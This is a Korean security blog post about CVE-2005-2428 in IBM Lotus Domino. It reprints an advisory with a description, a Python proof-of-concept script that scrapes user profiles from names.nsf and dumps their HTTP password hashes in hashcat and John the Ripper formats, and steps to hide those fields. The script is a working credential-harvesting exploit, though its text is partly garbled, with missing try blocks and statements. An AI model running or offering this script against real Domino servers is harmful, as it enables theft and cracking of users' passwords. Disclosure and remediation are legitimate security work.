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안녕하세요.^^ 더 정확하고 빠른 소식을 전달하여 드리는 Wide-Network! 입니다.

이번에 IBM 로터스 도미노에서 R8 암호 해쉬 추출 취약점이 발견되었습니다.

아마 저희 Wide-Network가 최초의 포스팅이 아닐까... 싶은데 역시 무리겠죠?^^;

CVE 코드는 CVE-2005-2428 입니다.

1. Description
IBM Domino Databases contain a configuration issue allowing users to obtain password hashes, configuraiton information and more from the Public Address Book (i.e., names.nsf database). Password hashes are obtained from the hidden HTML HTTPPassword and dspHTTPPassword fields per user in the database.
2. Proof of Concept
#!/usr/bin/env python2
import requests, re, BeautifulSoup, sys, argparse, os
parser = argparse.ArgumentParser(description='Domino Effect - A Lotus Domino password hash tool by Jonathan Broche (@g0jhonny)', version="1.0")
parser.add_argument('system', help="IP address or hostname to harvest hashes from. ")
parser.add_argument('-u', '--uri', metavar='path', default="/names.nsf", help="Path to the names.nsf file. [Default: /names.nsf]")
outgroup = parser.add_argument_group(title="Output Options")
outgroup.add_argument('--hashcat', action='store_true'help="Print results for use with hashcat.")
outgroup.add_argument('--john', action='store_true', help="Print results for use with John the Ripper.")
if len(sys.argv) == 1:
args = parser.parse_args()
print "\nDomino Effect {}\n".format(parser.version)
headers={'User-Agent':'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3'}
    response = requests.get("https://{}{}/People?OpenView".format(args.system, args.uri), verify=False, headers=headers, timeout=3)
except requests.exceptions.Timeout as e:
    print "[!] Timed out, try again."
except Exception as e:
        print e
soup = BeautifulSoup.BeautifulSoup(response.text)
links = []
#grab all user profile links
for link in soup.findAll('a'):
    if "OpenDocument" in link['href']:
        if link['href'] not in links:
hashes = {}
for link in links: #get user profile
        response = requests.get("https://{}{}".format(args.system, link), verify=False, headers=headers, timeout=2)
    except requests.exceptions.Timeout as e:
    except Exception as e:
        print e
    if response.text:
        soup = BeautifulSoup.BeautifulSoup(response.text)
        name = soup.find('input', {'name' : '$dspShortName'}).get('value').strip() #short name
        httppassword = soup.find('input', { "name" : "HTTPPassword"}).get('value').strip()
        dsphttppassword = soup.find('input', { "name" : "dspHTTPPassword"}).get('value').strip()
        if httppassword and httppassword not in hashes.keys():
            hashes[httppassword] = name
        elif dsphttppassword and dsphttppassword not in hashes.keys():
            hashes[dsphttppassword] = name     
if hashes: #output
    if args.hashcat or args.john:
        if args.hashcat:
            for h in hashes.keys():
                print h
        if args.john:
            for h, n in hashes.items():
                print "{}:{}".format(n,h)
        for h, n in hashes.items():
            print "[*] User: {} Hash: {}".format(n, h)
print "\n{} hashes obtained\n".format(len(hashes))
3. Solution
To hide the HTTP password from the HTML source:
1) Open the $PersonalInheritableSchema subform (In the designer under Shared Code, Subforms).
2) Find the fields: $dspHTTPPassword and HTTPPassword.
3) In the field properties for both fields, on the hide tab under "Hide paragram from" check off "Web browsers".
4) Open the Person form (Under Forms).
5) In the form properties, on the 2nd tab, disable the option "Generate HTML for all fields".
In addition, ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other senstive files.

위가 Exploit Code 입니다.^^

연구 목적으로 사용하시기 바랍니다.
